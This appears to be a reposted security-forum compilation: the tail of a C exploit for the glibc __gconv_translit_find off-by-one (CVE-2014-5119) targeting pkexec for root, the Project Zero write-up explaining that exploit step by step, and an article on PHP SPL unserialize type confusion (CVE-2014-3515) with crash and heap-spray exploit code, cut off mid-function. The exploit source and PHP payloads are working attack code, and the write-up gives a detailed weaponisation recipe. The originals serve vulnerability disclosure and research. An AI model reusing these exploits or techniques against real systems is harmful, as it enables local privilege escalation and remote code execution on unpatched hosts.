anonymous map, in case the kernel didn't tag the heap. if (strlen(filename) == 0) { anon = line; } // If the kernel did tag the heap, then everything is easy. if (strcmp(filename, "[heap]") == 0) { logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart); *baseaddr = mapstart; } // If it didn't tag the heap, then we need the anonymous chunk before the stack. if (strcmp(filename, "[stack]") == 0 && !*baseaddr) { logmessage(LOG_WARN, "no [heap] tag was found, using heuristic..."); if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) { logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon); } logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr); } if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') { logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart); *libcaddr = mapstart; } // Try to find libc bss. if (strlen(filename) == 0 && mapend - mapstart == 0x102000) { logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart); *bssaddr = mapstart; } continue; } logmessage(LOG_ERROR, "unable to parse maps line `%s`, quiting", line); break; } return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0; } static const size_t heap_chunk_start = 0x506c8008; static const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024); static const size_t nstrings = 15840000; // The offset into libc-2.18.so BSS of tls_dtor_list. static const uintptr_t kTlsDtorListOffset = 0x12d4; // The DSO we want to load as euid 0. static const char kExploitDso[] = "./exploit.so"; int main(int argc, const char* argv[]) { uintptr_t baseaddr; uintptr_t chunkptr; uintptr_t bssaddr; uintptr_t libcaddr; uint8_t *param; char **args; dlist_t *chain; struct utsname ubuf; // Look up host type. if (uname(&ubuf) != 0) { logmessage(LOG_ERROR, "failed to query kernel information"); } logmessage(LOG_DEBUG, "---------------------------------------------------"); logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit"); logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----"); // Print some warning that this isn't going to work on Ubuntu. if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0) logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20"); // Extract some useful pointers from glibc error output. if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) { logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again."); } logmessage(LOG_DEBUG, "allocating space for argument structure..."); // This number of "-u" arguments is used to spray the heap. // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern. // The value is just large enough to usuaully crash the heap into the stack without going OOM. if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) { logmessage(LOG_ERROR, "allocating argument structure failed"); } logmessage(LOG_DEBUG, "creating command string..."); args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0); args[nstrings * 2 + 2] = NULL; logmessage(LOG_DEBUG, "creating a tls_dtor_list node..."); // The length 59 is chosen to cause a 64byte allocation by stdrup. That is // a 60 byte nul-terminated string, followed by 4 bytes of metadata. param = alloc_repeated_string(59, 'A', 'A', 0); chain = (void *) param; logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF); logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname)); chain->func = libcaddr + _OPEN_TRANSLIT_OFF; chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname); chain->map = baseaddr + 8 + sizeof(*chain); chain->next = baseaddr + 8 + 59 - strlen(kExploitDso); logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso); memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12); logmessage(LOG_DEBUG, "building parameter list..."); for (int i = 0; i < nstrings; ++i) { args[i*2 + 1] = "-u"; args[i*2 + 2] = (void *) chain; } // Verify we didn't sneak in a NUL. assert(memchr(chain, 0, sizeof(chain)) == NULL); logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset); // Spam all of possible chunks (some are unfortunately missed). for (int i = 0; true; i++) { uintptr_t chunksize = 64; uintptr_t chunkaddr = baseaddr + i * chunksize; uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK; uintptr_t chunkpageoffset = PAGE_MASK; uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32); uint8_t *param = NULL; mchunk_t chunk = { .prev_size = 0xCCCCCCCC, .size = 0xDDDDDDDD, .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14, .bk_nextsize = baseaddr + 8, }; // Compensate for heap metadata every 1MB of allocations. chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize); if (chunkaddr < heap_chunk_start) continue; if (chunkaddr > heap_chunk_end) break; chunkpageoffset = chunkaddr & ~PAGE_MASK; if (chunkpageoffset > targetpageoffset) { continue; } if (targetpageoffset - chunkpageoffset > chunksize) { continue; } // Looks like this will fit, compensate the pointers for alignment. chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset); if (memchr(&chunk, 0, sizeof chunk)) { logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i); continue; } args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0); memcpy(param + (targetpageoffset - chunkpageoffset), &chunk, sizeof chunk); } setrlimit(RLIMIT_STACK, &kRlimMax); setrlimit(RLIMIT_DATA, &kRlimMin); args[0] = "pkexec"; logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]); execvpe("pkexec", args, kCorruptCharsetEnviron); } Sursa: glibc Off-by-One NUL Byte gconv_translit_find Exploit
-
The poisoned NUL byte, 2014 edition Posted by Chris Evans, Exploit Writer Underling to Tavis Ormandy Back in this 1998 post to the Bugtraq mailing list, Olaf Kirch outlined an attack he called “The poisoned NUL byte”. It was an off-by-one error leading to writing a NUL byte outside the bounds of the current stack frame. On i386 systems, this would clobber the least significant byte (LSB) of the “saved %ebp”, leading eventually to code execution. Back at the time, people were surprised and horrified that such a minor error and corruption could lead to the compromise of a process. Fast forward to 2014. Well over a month ago, Tavis Ormandy of Project Zero disclosed a glibc NUL byte off-by-one overwrite into the heap. Initial reaction was skepticism about the exploitability of the bug, on account of the malloc metadata hardening in glibc. In situations like this, the Project Zero culture is to sometimes “wargame” the situation. geohot quickly coded up a challenge and we were able to gain code execution. Details are captured in our public bug. This bug contains analysis of a few different possibilities arising from an off-by-one NUL overwrite, a solution to the wargame (with comments), and of course a couple of different variants of a full exploit (with comments) for a local Linux privilege escalation. Inspired by the success of the wargame, I decided to try and exploit a real piece of software. I chose the “pkexec” setuid binary as used by Tavis to demonstrate the bug. The goal is to attain root privilege escalation. Outside of the wargame environment, it turns out that there are a series of very onerous constraints that make exploitation hard. I did manage to get an exploit working, though, so read on to see how. Step 1: Choose a target distribution I decided to develop against Fedora 20, 32-bit edition. Why the 32-bit edition? I’m not going to lie: I wanted to give myself a break. I was expecting this to be pretty hard so going after the problem in the 32-bit space gives us just a few more options in our trusty exploitation toolkit. Why Fedora and not, say, Ubuntu? Both ship pkexec by default. Amusingly, Ubuntu has deployed the fiendish mitigation called the “even path prefix length” mitigation. Kudos! More seriously, there is a malloc() that is key to the exploit, in gconv_trans.c:__gconv_translit_find(): newp = (struct known_trans *) malloc (sizeof (struct known_trans) + (__gconv_max_path_elem_len + name_len + 3) + name_len); If __gconv_max_path_elem_len is even, then the malloc() size will be odd. An odd malloc() size will always result in an off-by-one off the end being harmless, due to malloc() minimum alignment being sizeof(void*). On Fedora, __gconv_max_path_elem_len is odd due to the value being /usr/lib/gconv/ (15) or /usr/lib64/gconv/ (17). There are various unexplored avenues to try and influence this value on Ubuntu but for now we choose to proceed on Fedora. Step 2: Bypass ASLR Let’s face it, ASLR is a headache. On Fedora 32-bit, the pkexec image, the heap and the stack are all randomized, including relative to each other, e.g.: b772e000-b7733000 r-xp 00000000 fd:01 4650 /usr/bin/pkexec b8e56000-b8e77000 rw-p 00000000 00:00 0 [heap] bfbda000-bfbfb000 rw-p 00000000 00:00 0 [stack] There is often a way to defeat ASLR, but as followers of the path of least resistance, what if we could just bypass it altogether? Well, what happens if we run pkexec again after running the shell commands ulimit -s unlimited and ulimit -d 1 ? These altered limits to stack and data sizes are inherited across processes, even setuid ones: 40000000-40005000 r-xp 00000000 fd:01 9909 /usr/bin/pkexec 406b9000-407bb000 rw-p 00000000 00:00 0 /* mmap() heap */ bfce5000-bfd06000 rw-p 00000000 00:00 0 [stack] This is much better. The pkexec image and libraries, as well as the heap, are now in static locations. The stack still moves around, with about 8MB variation (or 11 bits of entropy if you prefer), but we already know static locations for both code and data without needing to know the exact location of the stack. (For those curious about the effect of these ulimits on 64-bit ASLR, the situation isn’t as bad there. The binary locations remain well randomized. The data size trick is still very useful, though: the heap goes from a random location relative to the binary, to a static offset relative to the binary. This represents a significant reduction in entropy for some brute-force scenarios.) Step 3: Massage the heap using just command line arguments and the environment After significant experimentation, our main heap massaging primitive is to call pkexec with a path comprising of ‘/’ followed by 469 ‘1’ characters. This path does not exist, so an error message including this path is built. The eventual error message string is a 508-byte allocation, occupying a 512-byte heap chunk on account of 4 bytes of heap metadata. The error message is built using an algorithm that starts with a 100-byte allocation. If the allocation is not large enough, it is doubled in size, plus 100 bytes, and the old allocation is freed after a suitable copy. The final allocation is shrunk to precise size using realloc. Running the full sequence through for our 508-byte string, we see the following heap API calls: malloc(100), malloc(300), free(100), malloc(700), free(300), realloc(508) By the time we get to this sequence, we’ve filled up all the heap “holes” so that these allocations occur at the end of the heap, leading to this heap layout at the end of the heap (where “m” means metadata and a red value shows where the corruption will occur): | free space: 100 |m| free space: 300 |m| error message: 508 bytes | In fact, the heap algorithm will have coalesced the 100 and 300 bytes of free space. Next, the program proceeds to consider character set conversion for the error message. This is where the actual NUL byte heap overflows occurs, due to our CHARSET=//AAAAA… environment variable. Leading up to this, a few small allocations outside of our control occur. That’s fine; they stack up at the beginning of the coalesced free space. An allocation based on our CHARSET environment variable now occurs. We choose the number of A’s in our value to cause an allocation of precisely 236 bytes, which perfectly fills the remaining space in the 400 bytes of free space. The situation now looks like this: | blah |m| blah |m| charset derived value: 236 bytes |m: 0x00000201| error message: 508 bytes | The off-by-one NUL byte heap corruption now occurs. It will clobber the LSB of the metadata word that precedes the error message allocation. The format of metadata is a size word, with a couple of flags in the two least significant bits. The flag 0x1, which is set, indicates that the previous buffer, the charset derived value, is in use. The size is 0x200, or 512 bytes. This size represents the 508 bytes of the following allocation plus 4 bytes of metadata. The size and flag values at this time are very specifically chosen so that the single NUL byte overflow only has the effect of clearing the 0x1 in use flag. The size is unchanged, which is important later when we need to not break forward coalescing during free(). Step 4: Despair The fireworks kick off when the error message is freed as the program exits. We have corrupted the preceding metadata to make it look like the previous heap chunk is free when in fact it is not. Since the previous chunk looks free, the malloc code attempts to coalesce it with the current chunk being freed. When a chunk is free, the last 4 bytes represent the size of the free chunk. But the chunk is not really free; so what does it contain as its last 4 bytes? Those bytes will be interpreted as a size. It turns out that as an attacker, we have zero control over these last 4 bytes: they are always 0x6f732e00, or the string “.so” preceded by a NUL byte. Obviously, this is a very large size. And unfortunately it is used as an index backwards in memory in order to find the chunk header structure for the previous chunk. Since our heap is in the 0x40000000 range, subtracting 0x6f732e00 ends us up in the 0xd0000000 range. This address is in kernel space so when we dereference it as a chunk header structure, we get a crash and our exploitation dreams go up in smoke. At this juncture, we consider alternate heap metadata corruption situations, in the hope we will find a situation where we have more control: Forward coalescing of free heap chunks. If we cause the same corruption as described above, but arrange to free the chunk preceding the overflowed chunk, we follow a different code path. It results in the beginning of the 236-byte allocation being treated as a pair of freelist pointers for a linked list operation. This sounds initially promising, but again, we do not seem to have full control over the these values. In particular, the second freelist pointer comes out as NULL (guaranteed crash) and it is not immediately obvious how to overlap a non-NULL value there. Overflowing into a free chunk. This opens up a whole range of possibilities. Unfortunately, our overflow is a NUL byte so we can only make free chunks smaller and not bigger, which is a less powerful primitive. But we can again cause confusion as to the location of heap metadata headers. See “shrink_free_hole_consolidate_backward.c” in our public bug. Again, we are frustrated because we do not have obvious control over the first bytes of any malloc() object that might get placed into the free chunk after we have corrupted the following length. Overflowing into a free chunk and later causing multiple pointers to point to the same memory. This powerful technique is covered in “shrink_free_hole_alloc_overlap_consolidate_backward.c” in our public bug. I didn’t investigate this path because the required precise sequence of heap operations did not seem readily possible. Also, the memory corruption occurs after the process has hit an error and is heading towards exit(), so taking advantage of pointers to overlapping memory will be hard. At this stage, things are looking bad for exploitation. Step 5: Aha! use a command-line argument spray to effect a heap spray and collide the heap into the stack The breakthrough to escape the despair of step 4 comes when we discover a memory leak in the pkexec program; from pkexec.c: else if (strcmp (argv[n], "--user") == 0 || strcmp (argv[n], "-u") == 0) { n++; if (n >= (guint) argc) { usage (argc, argv); goto out; } opt_user = g_strdup (argv[n]); } This is very useful! If we specify multiple “-u” command line arguments, then we will spray the heap, because setting a new opt_user value does not consider freeing the old one. Furthermore, we observe that modern Linux kernels permit a very large number of command-line arguments to be passed via execve(), with each one able to be up to 32 pages long. We opt to pass a very large number (15 million+) of “-u” command line argument values, each a string of 59 bytes in length. 59 bytes plus a NUL terminator is a 60 byte allocation, which ends up being a 64 byte heap chunk when we include metadata. This number is important later. The effect of all these command line arguments is to bloat both the stack (which grows down) and the heap (which grows up) until they crash into each other. In response to this collision, the next heap allocations actually go above the stack, in the small space between the upper address of the stack and the kernel space at 0xc0000000. We use just enough command line arguments so that we hit this collision, and allocate heap space above the stack, but do not quite run out of virtual address space -- this would halt our exploit! Once we’ve caused this condition, our tail-end mappings look a bit like this: 407c8000-7c7c8000 rw-p 00000000 00:00 0 /* mmap() based heap */ 7c88e000-bf91c000 rw-p 00000000 00:00 0 [stack] bf91c000-bff1c000 rw-p 00000000 00:00 0 /* another mmap() heap extent */ Step 6: Commandeer a malloc metadata chunk header The heap corruption listed in step 3 now plays out in a heap extent that is past the stack. Why did we go to all this effort? Because it avoids the despair in step 4. The huge backwards index of 0x63732e00 now results in an address that is mapped! Specifically, it will hit somewhere around the 0x50700000 range, squarely in the middle of our heap spray. We control the content at this address. At this juncture, we encounter the first non-determinism in our exploit. This is of course a shame as we deployed quite a few tricks to avoid randomness. But, by placing a heap extent past the stack, we’ve fallen victim to stack randomization. That’s one piece of randomization we were not able to bypass. By experimental determination, the top of the stack seems to range from 0xbf800000-0xbffff000, for 2048 (2^11) different possibilities with 4k (PAGE_SIZE) granularity. A brief departure on exploit reliability. As we spray the heap, the heap grows in mmap() extents of size 1MB. There is no control over this. Therefore, there’s a chance that the stack will randomly get mapped sufficiently high that a 1MB mmap() heap extent cannot fit above the stack. This will cause the exploit to fail about 1 in 8 times. Since the exploit is a local privilege escalation and takes just a few seconds, you can simply re-run it. In order to get around this randomness, we cater for every possible stack location in the exploit. The backwards index to a malloc chunk header will land at a specific offset into any one of 2048 different pages. So we simply forge a malloc chunk header at all of those locations. Whichever one hits by random, our exploit will continue in a deterministic manner by using the same path forward. At this time, it’s worth noting why we sprayed the heap with 59-byte strings. These end up spaced 64 bytes apart. Since 64 is a perfect multiple of PAGE_SIZE (4096), we end up with a very uniform heap spray pattern. This gives us two things: an easy calculation to map command line arguments to an address where the string will be placed in the heap, and a constant offset into the command line strings for where we need to place the forged heap chunk payload. Step 7: Clobber the tls_dtor_list So, we have now progressed to the point where we corrupt memory such that a free() call will end up using a faked malloc chunk header structure that we control. In order to further progress, we abuse freelist linked list operations to write a specific value to a specific address in memory. Let’s have a look at the malloc.c code to remove a pointer from a doubly-linked freelist: #define unlink(AV, P, BK, FD) { \ [...] if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) { \ mutex_unlock(&(AV)->mutex); \ malloc_printerr (check_action, "corrupted double-linked list", P); \ mutex_lock(&(AV)->mutex); \ } else { \ if (!in_smallbin_range (P->size) \ && __builtin_expect (P->fd_nextsize != NULL, 0)) { \ assert (P->fd_nextsize->bk_nextsize == P); \ assert (P->bk_nextsize->fd_nextsize == P); \ if (FD->fd_nextsize == NULL) { \ [...] } else { \ P->fd_nextsize->bk_nextsize = P->bk_nextsize; \ P->bk_nextsize->fd_nextsize = P->fd_nextsize; \ [...] We see that the main doubly linked list is checked in a way that makes it hard for us to write to arbitrary locations. But the special doubly linked list for larger allocations has only some debug asserts for the same type of checks. (Aside: there’s some evidence that Ubuntu glibc builds might compile these asserts in, even for release builds. Fedora certainly does not.) So we craft our fake malloc header structure so that the main forward and back pointers point back to itself, and so that the size is large enough to enter the secondary linked list mani****tion. This bypasses the main linked list corruption check, but allows us to provide arbitrary values for the secondary linked list. These arbitrary values let us write an arbitrary 4-byte value to an arbitrary 4-byte address, but with a very significant limitation: the value we write must itself be a valid writeable address, on account of the double linking of the linked list. i.e. after we write our arbitrary value of P->bk_nextsize to P->fd_nextsize, the value P->bk_nextsize is itself dereferenced and written to. This limitation does provide a headache. At this point in the process’ lifetime, it is printing an error message just before it frees a few things up and exits. There are not a huge number of opportunities to gain control of code execution, and our corruption primitive does not let us directly overwrite a function pointer with another, different pointer to code. To get around this, we note that there are two important glibc static data structure pointers that indirectly control some code that gets run during the exit() process: __exit_funcs and tls_dtor_list. __exit_funcs does not work well for us because the structure contains an enum value that has to be some small number like 0x00000002 in order to be useful to us. It is hard for us to construct fake structures that contain NUL bytes in them because our building block is the NUL-terminated string. But tls_dtor_list is ideal for us. It is a singly linked list that runs at exit() time, and for every list entry, an arbitrary function pointer is called with an arbitrary value (which has to be a pointer due to previous contraints)! It’s an easy version of ROP. Step 8: Deploy a chroot() trick For our first attempt to take control of the program, we simply call system(“/bin/bash”). This doesn’t work because this construct ends up dropping privileges. It is a bit disappointing to go to so much trouble to run arbitrary code, only to end up with a shell running at our original privilege level. The deployed solution is to chain in a call to chroot() before the call to system(). This means that when system() executes /bin/sh, it will do so inside a chroot we have set up to contain our own /bin/sh program. Inside our fake /bin/sh, we will end up running with effective root privilege. So we switch to real root privilege by calling setuid(0) and then execute a real shell. TL;DR: Done! We escalated from a normal user account to root privileges. Step 9: Tea and medals; reflect The main point of going to all this effort is to steer industry narrative away from quibbling about whether a given bug might be exploitable or not. In this specific instance, we took a very subtle memory corruption with poor levels of attacker control over the overflow, poor levels of attacker control over the heap state, poor levels of attacker control over important heap content and poor levels of attacker control over program flow. Yet still we were able to produce a decently reliable exploit! And there’s a long history of this over the evolution of exploitation: proclamations of non-exploitability that end up being neither advisable nor correct. Furthermore, arguments over exploitability burn time and energy that could be better spent protecting users by getting on with shipping fixes. Aside from fixing the immediate glibc memory corruption issue, this investigation led to additional observations and recommendations: Memory leaks in setuid binaries are surprisingly dangerous because they can provide a heap spray primitive. Fixing the pkexec memory leak is recommended. The ability to lower ASLR strength by running setuid binaries with carefully chosen ulimits is unwanted behavior. Ideally, setuid programs would not be subject to attacker-chosen ulimit values. There’s a long history of attacks along these lines, such as this recent file size limit attack. Other unresolved issues include the ability to fail specific allocations or fail specific file opens via carefully chosen RLIMIT_AS or RLIMIT_NOFILE values. The exploit would have been complicated significantly if the malloc main linked listed hardening was also applied to the secondary linked list for large chunks. Elevating the assert() to a full runtime check is recommended. We also noticed a few environment variables that give the attacker unnecessary options to control program behavior, e.g. G_SLICE letting the attacker control properties of memory allocation. There have been interesting historical instances where controlling such properties assisted exploitation such as this traceroute exploit from 2000. We recommend closing these newer routes too. I hope you enjoyed this write-up as much as I enjoyed developing the exploit! There’s probably a simple trick that I’ve missed to make a much simpler exploit. If you discover that this is indeed the case, or if you pursue a 64-bit exploit, please get in touch! For top-notch work, we’d love to feature a guest blog post. Sursa: Project Zero: The poisoned NUL byte, 2014 edition
-
SPL ArrayObject/SPLObjectStorage Unserialization Type Confusion Vulnerabilities Posted: 2014-08-27 09:23 by Stefan Esser Introduction One month ago the PHP developers released security updates to PHP 5.4 and PHP 5.5 that fixed a number of vulnerabilities. A few of these vulnerabilities were discovered by us and we already disclosed the lesser serious one in our previous blogpost titled phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys. We showed that this vulnerability allowed retrieving the SSL private key from Apache memory. However we kept silent about two more serious type confusion vulnerabilities that were reachable through PHP's unserialize() function until the PHP team had the chance to not only fix PHP 5.4 and PHP 5.5 but also release a final PHP 5.3 release, which fixes these vulnerabilities. Unlike the information leak disclosed before these type confusions can lead to arbitrary remote code execution. The PHP function unserialize() allows do deserialize PHP variables that were previously serialized into a string represantation by means of the serialize() function. Because of this it has traditionally been used by PHP application developers to transfer data between PHP applications on different servers or as compressed format to store some data client side, despite all warnings that this is potentially dangerous. The dangers arising from this function are twofold. On the one hand it allows to instantiate classes that PHP knows about at the time of execution, which can be abused sometimes to execute arbitrary code as demonstrated in our research Utilizing Code Reuse Or Return Oriented Programming In PHP Application Exploits presented at BlackHat USA 2010. On the other hand there is the danger of memory corruptions, type confusions or use after free vulnerabilities in the unserialize() function itself. The researchers of SektionEins have shown the existence of both types of problems again and again in the past. During source code audits we perform for our customers we still see unserialize() being used on user input today, despite all the previous vulnerabilities in unserialize() and various examples of successful compromises through object injections. Research from other teams has even shown that often encryption and signing shemes people think up to protect serialized data, do not work and can be exploited. In this post we will detail two type confusion vulnerabilities in the deserialization of SPL ArrayObject and SPL ObjectStorage objects that we disclosed to PHP.net and show how they allow attackers to execute arbitrary code on the server. Both vulnerabilities have the CVE name CVE-2014-3515 assigned. The Vulnerabilities The vulnerabilities in question are located in the PHP source code inside the file /ext/spl/splarray.c inside the SPL_METHOD(Array, unserialize) and inside the file /ext/spl/spl_observer.c inside the SPL_METHOD(SplObjectStorage, unserialize). The vulnerabilities are located in the handling of serialized object member variables. ALLOC_INIT_ZVAL(pmembers);if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) { zval_ptr_dtor(&pmembers); goto outexcept; } /* copy members */ if (!intern->std.properties) { rebuild_object_properties(&intern->std); } zend_hash_copy(intern->std.properties, Z_ARRVAL_P(pmembers), (copy_ctor_func_t) zval_add_ref, (void *) NULL, sizeof(zval *)); zval_ptr_dtor(&pmembers); The code above calls the deserializer to get the member variables from the serialized string and then copies them into the properties with the zend_hash_copy() function. The type confusion vulnerability here is that the code assumes that the deserialization returns a PHP array. This is however not checked and fully depends on the content of the serialized string. The result is then used via the Z_ARRVAL_P macro which leads to various problems depending on what type of variable is actually returned by the deserializer. To understand the problem in more detail let us look at the definition of a ZVAL (ignoring the GC version) and the Z_ARRVAL_P macro: typedef union _zvalue_value { long lval; /* long value */ double dval; /* double value */ struct { char *val; int len; } str; HashTable *ht; /* hash table value */ zend_object_value obj; } zvalue_value; struct _zval_struct { /* Variable information */ zvalue_value value; /* value */ zend_uint refcount__gc; zend_uchar type; /* active type */ zend_uchar is_ref__gc; }; #define Z_ARRVAL(zval) (zval).value.ht #define Z_ARRVAL_P(zval_p) Z_ARRVAL(*zval_p) As you can see from these definitions accessing the Z_ARRVAL of a PHP variable will lookup the pointer to HashTable structure from the union zvalue_value. The HashTable structure is PHP's internal way to store array data. Because this is a union for other variable types this pointer will be filled with different types of data. A PHP integer variable for example will have its value stored in the same position as the pointer of the PHP array variable (in case sizeof(long) == sizeof(void *)). The same is true for the value of floating point variables and the other variable types. Let's look into what happens when the deserializer returns an integer (or maybe a double value for Win64): The value of the integer will be used as an in memory pointer to a HashTable and its data will be copied over into another array. The following little POC code demonstrates this and will make the deserializer attempt to work on a HashTable starting at memory address 0x55555555. This should result in a crash, because it is usually an invalid memory position. [phpcode]<?php unserialize("C:11:\"ArrayObject\":28:{x:i:0;a:0:{};m:i:1431655765;});"); ?>[/phpcode] In case the memory address does point to a real HashTable structure, its content is copied over into the deserialized array object as its member variables. This is useful in case the result of the deserialization is serialized again and returned to the user, which is a common pattern in applications exposing unserialize() to user input. The following PHP code is an example of this pattern. [phpcode]<?php $data = unserialize(base64_decode($_COOKIE['data'])); $data['visits']++; setcookie("data", base64_encode($data)); ?>[/phpcode] Whenever unserialize() is used in a similar way as above, vulnerabilities exposed through unserialize() can result in information leaks. Digging Deeper While integer variables allow us to interpret arbitrary memory positions as HashTable PHP's string variable type might be more interesting for an attacker. When you look at the ZVAL structure above you will realize that the array's HashTable pointer is in the same position as a string's stringdata pointer. This means if the deserializer returns a string instead of an array the content of the string will be accessed as if it is a HashTable. Let's have a look into what these HashTables structures are. [cpp]typedef struct _hashtable { uint nTableSize; /* current size of bucket space (power of 2) */ uint nTableMask; /* nTableSize - 1 for faster calculation */ uint nNumOfElements; /* current number of elements */ ulong nNextFreeElement; /* next free numerical index */ Bucket *pInternalPointer; /* used for element traversal */ Bucket *pListHead; /* head of double linked list of all elements in array */ Bucket *pListTail; /* tail of double linked list of all elements in array */ Bucket **arBuckets; /* hashtable bucket space */ dtor_func_t pDestructor; /* element destructor */ zend_bool persistent; /* marks hashtable lifetime as persistent */ unsigned char nApplyCount; /* required to stop endless recursions */ zend_bool bApplyProtection; /* required to stop endless recursions */ } HashTable;[/cpp] PHP's HashTable structure is a mixture of the data structures hashtable and double linked list. This allows for fast element access but also allows to traverse the elements of an array in order. The elements of the array are stored in so called Buckets that either inline the data or provide a pointer to the actual data associated with a bucket. For every possible hash value the topmost bucket is addressed through a pointer from the bucket space. The bucket data structure is as follows: [cpp]typedef struct bucket { ulong h; /* Used for numeric indexing */ uint nKeyLength; /* 0 for numeric indicies, otherwise length of string */ void *pData; /* address of the data */ void *pDataPtr; /* storage place for data if datasize == sizeof(void *) */ struct bucket *pListNext; /* next pointer in global linked list */ struct bucket *pListLast; /* prev pointer in global linked list */ struct bucket *pNext; /* next pointer in bucket linked list */ struct bucket *pLast; /* prev pointer in bucket linked list */ char arKey[1]; /* Must be last element - recently changed to point to external array key */ } Bucket;[/cpp] With those two data structures it is now possible to layout a fake HashTable in the string that is passed to unserialize that itself points to a fake array in memory. Depending on the content of that fake array the destruction of the just deserialized object at the end of the script will trigger the attacker(fake array) supplied HashTable destructor, which gives the attacker control over the program counter. The first parameter to this destructor is a pointer to the pointer to the fake ZVAL supplied by the fake Bucket, which means a pivot gadget that moves the first function paramter into the stack pointer would be enough to start a ROP chain. Proof of Concept Exploit The following code was shared with the PHP developers on 20th June 2014. It is a POC that demonstrates program counter control from a PHP script. The POC was developed against a standard MacOSX 10.9.3 installation of PHP 5.4.24. It works by first spraying the heap with a repeated pattern of fake hashtables, buckets and zvals and then triggers the malicious unserialize(). Keep in mind that a remote attacker could heap spray PHP installations by sending lots of POST data to the server and then pass a malicious string to a user input exposed unserialize(). [phpcode]<?php /* Unserialize ArrayObject Type Confusion Exploit */ /* (C) Copyright 2014 Stefan Esser */ ini_set("memory_limit", -1); if ($_SERVER['argc'] < 2) { $__PC__ = 0x504850111110; } else { $__PC__ = $_SERVER['argv'][1] + 0; } // we assume that 0x111000000 is controlled by our heap spray $base = 0x114000000 + 0x20; echo "Setting up memory...\n"; setup_memory(); echo "Now performing exploit...\n"; $inner = 'x:i:0;a:0:{};m:s:'.strlen($hashtable).':"'.$hashtable.'";'; $exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}'; $z = unserialize($exploit); unset($z); function setup_memory() { global $str, $hashtable, $base, $__PC__; // we need FAKE HASH TABLE / FAKE BUCKET / FAKE ZVAL $bucket_addr = $base; $zval_delta = 0x100; $hashtable_delta = 0x200; $zval_addr = $base + $zval_delta; $hashtable_addr = $base + $hashtable_delta; //typedef struct bucket { $bucket = "\x01\x00\x00\x00\x00\x00\x00\x00"; // ulong h; $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00"; // uint nKeyLength = 0 => numerical index $bucket .= ptr2str($bucket_addr + 3*8);// void *pData; $bucket .= ptr2str($zval_addr); // void *pDataPtr; $bucket .= ptr2str(0);// struct bucket *pListNext; $bucket .= ptr2str(0);// struct bucket *pListLast; $bucket .= ptr2str(0);// struct bucket *pNext; $bucket .= ptr2str(0);// struct bucket *pLast; $bucket .= ptr2str(0);// const char *arKey; //} Bucket; //typedef struct _hashtable { $hashtable = "\x00\x00\x00\x00";// uint nTableSize; $hashtable .= "\x00\x00\x00\x00";// uint nTableMask; $hashtable .= "\x01\x00\x00\x00";// uint nNumOfElements; $hashtable .= "\x00\x00\x00\x00"; $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";// ulong nNextFreeElement; $hashtable .= ptr2str(0);// Bucket *pInternalPointer; /* Used for element traversal */ $hashtable .= ptr2str($bucket_addr);// Bucket *pListHead; $hashtable .= ptr2str(0);// Bucket *pListTail; $hashtable .= ptr2str(0);// Bucket **arBuckets; $hashtable .= ptr2str($__PC__);// dtor_func_t pDestructor; $hashtable .= "\x00";// zend_bool persistent; $hashtable .= "\x00";// unsigned char nApplyCount; // zend_bool bApplyProtection; //} HashTable; //typedef union _zvalue_value { // long lval; /* long value */ // double dval; /* double value */ // struct { // char *val; // int len; // } str; // HashTable *ht; /* hash table value */ // zend_object_value obj; //} zvalue_value; //struct _zval_struct { /* Variable information */ $zval = ptr2str($hashtable_addr);// zvalue_value value; /* value */ $zval .= ptr2str(0); $zval .= "\x00\x00\x00\x00";// zend_uint refcount__gc; $zval .= "\x04";// zend_uchar type; /* active type */ $zval .= "\x00";// zend_uchar is_ref__gc; $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(0); //}; /* Build the string */ $part = str_repeat("\x73", 4096); for ($j=0; $j<strlen($bucket); $j++) { $part[$j] = $bucket[$j]; } for ($j=0; $j<strlen($hashtable); $j++) { $part[$j+$hashtable_delta] = $hashtable[$j]; } for ($j=0; $j<strlen($zval); $j++) { $part[$j+$zval_delta] = $zval[$j]; } $str = str_repeat($part, 1024*1024*256/4096); } function ptr2str($ptr) { $out = ""; for 